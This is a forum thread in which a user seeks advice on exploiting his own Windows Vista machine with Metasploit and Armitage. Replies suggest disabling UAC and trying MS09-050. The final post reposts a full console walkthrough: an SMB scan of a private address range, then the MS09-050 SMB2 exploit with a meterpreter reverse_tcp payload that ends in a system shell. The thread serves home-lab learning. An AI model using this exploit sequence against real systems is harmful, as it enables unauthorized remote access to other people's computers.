Jamo Posted December 23, 2010 Share Posted December 23, 2010 Hi Im using armitage and metasploit. Im trying to attack windows vista machine at my home. the target machine is mine. Only machine that I have been able to attack and gain access is windows 2000. So what exploits should I use. Please help me, Im just trying to learn to use metasploit. Quote Link to comment Share on other sites More sharing options...
555 Posted December 26, 2010 Share Posted December 26, 2010 I need to dust up on my metasploit skills too, there was a Hak5 episode that had a Metasploit tutorial that Mubix did but I forget which episode it was.. I just got another pc tower I would like to start practicing on for fun, I also got a book on metasploit but I am too lazy to read the 400 pages right now lol Quote Link to comment Share on other sites More sharing options...
Jamo Posted December 26, 2010 Author Share Posted December 26, 2010 Iv seen that episede, in it they use some kind of website attack or something like that. In that it requires that user at target pc goes to that site. Its not what I need. Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted December 27, 2010 Share Posted December 27, 2010 What kind of errors do you receive in Metasploit framework, when you try to exploit Vista? Plus you will need to make sure UAC is not running, I found out that it can block metasploits attacks. Quote Link to comment Share on other sites More sharing options...
Jamo Posted December 27, 2010 Author Share Posted December 27, 2010 What kind of errors do you receive in Metasploit framework, when you try to exploit Vista? Plus you will need to make sure UAC is not running, I found out that it can block metasploits attacks. Arimitage didnt give any errors. I scanned target. imported it to armitage and tried to attack vista machine (the target). I tried every exploit that armitage recommended. UAC was on when I tried to attack that machine Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted December 28, 2010 Share Posted December 28, 2010 Arimitage didnt give any errors. I scanned target. imported it to armitage and tried to attack vista machine (the target). I tried every exploit that armitage recommended. UAC was on when I tried to attack that machine Have you tried turning off the UAC? I've read in other forums that, with the UAC turned on most of the exploitation won't work very well. Quote Link to comment Share on other sites More sharing options...
Jamo Posted December 28, 2010 Author Share Posted December 28, 2010 Have you tried turning off the UAC? I've read in other forums that, with the UAC turned on most of the exploitation won't work very well. Not yet, Ill have to give it a try Quote Link to comment Share on other sites More sharing options...
mubix Posted March 21, 2011 Share Posted March 21, 2011 Hi Im using armitage and metasploit. Im trying to attack windows vista machine at my home. the target machine is mine. Only machine that I have been able to attack and gain access is windows 2000. So what exploits should I use. Please help me, Im just trying to learn to use metasploit. What is the machine vulnerable to? What patches have been applied? Are your looking to do a completely remote attack against an unused fresh build of Vista? You can try 09_050. Might work. Quote Link to comment Share on other sites More sharing options...
Infiltrator Posted March 21, 2011 Share Posted March 21, 2011 What is the machine vulnerable to? What patches have been applied? Are your looking to do a completely remote attack against an unused fresh build of Vista? You can try 09_050. Might work. It can be quite hard sometimes to exploit a XP or Vista machine. It all depends on how well the target machine is patched up. There are ways to make it vulnerable. Like uninstalling the patches, making sure there are no security essentials enabled (eg Firewall, Antivirus) And a few other things, that I can't remember from the top of my head. But these are very basic steps you can take to make a host vulnerable. Quote Link to comment Share on other sites More sharing options...
Jamo Posted March 22, 2011 Author Share Posted March 22, 2011 Thanks for replies. I prefer not to use browser attacks, not attack involving user opening a file or going to a website. Quote Link to comment Share on other sites More sharing options...
digip Posted March 22, 2011 Share Posted March 22, 2011 A lot of times its also not even required to be patched to be protected. I have a VM that is vulnerable to the MS08-068 flaw. Its a XP Pro SP3 machine, but if I turn off the "Server", "Workstation" and "Computer Browser" services, the attack doesn't work since it exploits SMB with remote code execution. If a machien is vulnerable to attack, but the default services required to exploit it are turned off, you aren't going to get in using the built in exploits to metasploit. You will need something custom or browser based that can attack 3rd party apps. Most attacks these days are browser based anyway since they can be deployed to any number of sites you can lure the victim to and the corporate networks usually allow people to browse the internet. With that said, its not entirely impossible to do client side attacks, but you have to know what to attack on the system that could be flawed, even when there are no services showing with a port scan. If you have patched this machine with all the latest updates, about the only ways to get in would be 3rd party apps such as Flash or Acrobat, Quicktime, older browsers such as FireFox, IE6, etc, or finding a 0-day flaw. You can try several different methods of scanning though. While Armitage will try nmap and metasploit scanning, you can also try other scanners such as Nessus(since its your own network, apply for a home key and run it on your own personal boxes) to see what it can tell you as well. To exploit it, you may need a custom written exploit once you know all the target information, and this is where combining it with metasploit would help you, but not every exploit or flaw is going to be in metasploit by default. Part of being a pentester is having to write your own exploit code and custom shellcode, which is why you need a better understanding of the complete picture from how buffer overflows work to, bypassing DEP and ASLR, egg hunting, etc. Stuff that is just way over my head, but I know enough to keep myself out of trouble. Quote Link to comment Share on other sites More sharing options...
djmed Posted May 12, 2011 Share Posted May 12, 2011 http://evilc0de.blogspot.com/2010/09/exploiting-vista-sp1-with-smb2.html [o] Exploiting Vista SP1 with SMB2 [metasploit] [o] Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference root@evilc0de:~# msfconsole <> ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 590 exploits - 302 auxiliary + -- --=[ 224 payloads - 27 encoders - 8 nops =[ svn r10414 updated today (2010.09.21) msf > use scanner/smb/smb_version msf auxiliary(smb_version) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads msf auxiliary(smb_version) > set RHOSTS 172.16.0.1-172.16.4.255 RHOSTS => 172.16.0.1-172.16.4.255 msf auxiliary(smb_version) > set THREADS 50 THREADS => 50 msf auxiliary(smb_version) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 172.16.0.1-172.16.4.255 yes The target address range or CIDR identifier SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 50 yes The number of concurrent threads msf auxiliary(smb_version) > run [*] 172.16.1.145 is running Windows 7 Professional (Build 7600) (language: Unknown) (name:ONAN-ULTIMECIA) (domain:ONAN-ULTIMECIA) [*] 172.16.1.138 is running Windows Vista Ultimate Service Pack 1 (language: Unknown) (name:PUPEN-SNOWBLACK) (domain:KAPUKVALLEY) [*] 172.16.1.173 is running Windows XP Service Pack 2+ (language: English) (name:ALLSTAR-TAPO) (domain:KAPUKVALLEY) [*] 172.16.1.162 is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:PINKY-BENZ) (domain:KAPUKVALLEY) msf auxiliary(smb_version) > use windows/smb/ms09_050_smb2_negotiate_func_index msf exploit(ms09_050_smb2_negotiate_func_index) > info Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference Version: 9669 Platform: Windows Privileged: Yes License: Metasploit Framework License (BSD) Rank: Good Provided by: laurent.gaffie hdm sf Available targets: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86) Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The target port WAIT 180 yes The number of seconds to wait for the attack to complete. Payload information: Space: 1024 Description: This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw. References: http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103 http://www.securityfocus.com/bid/36299 http://www.osvdb.org/57799 http://seclists.org/fulldisclosure/2009/Sep/0039.html http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST 172.16.1.138 RHOST => 172.16.1.138 msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST 172.16.1.12 LHOST => 172.16.1.12 msf exploit(ms09_050_smb2_negotiate_func_index) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 172.16.1.138 yes The target address RPORT 445 yes The target port WAIT 180 yes The number of seconds to wait for the attack to complete. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST 172.16.1.12 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86) msf exploit(ms09_050_smb2_negotiate_func_index) > exploit [*] Started reverse handler on 172.16.1.12:4444 [*] Connecting to the target (172.16.1.138:445)... [*] Sending the exploit packet (872 bytes)... [*] Waiting up to 180 seconds for exploit to trigger... [*] Sending stage (748544 bytes) to 172.16.1.138 [*] Meterpreter session 1 opened (172.16.1.12:4444 -> 172.16.1.138:55345) at 2010-09-21 23:31:10 +0700 meterpreter > sysinfo Computer: PUPEN-SNOWBLACK OS : Windows Vista (Build 6001, Service Pack 1). Arch : x86 Language: en_US meterpreter > shell Process 1240 created. Channel 1 created. Microsoft Windows [Version 6.0.6001] Copyright © 2006 Microsoft Corporation. All rights reserved. C:\Windows\system32>net user net user User accounts for \\ Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.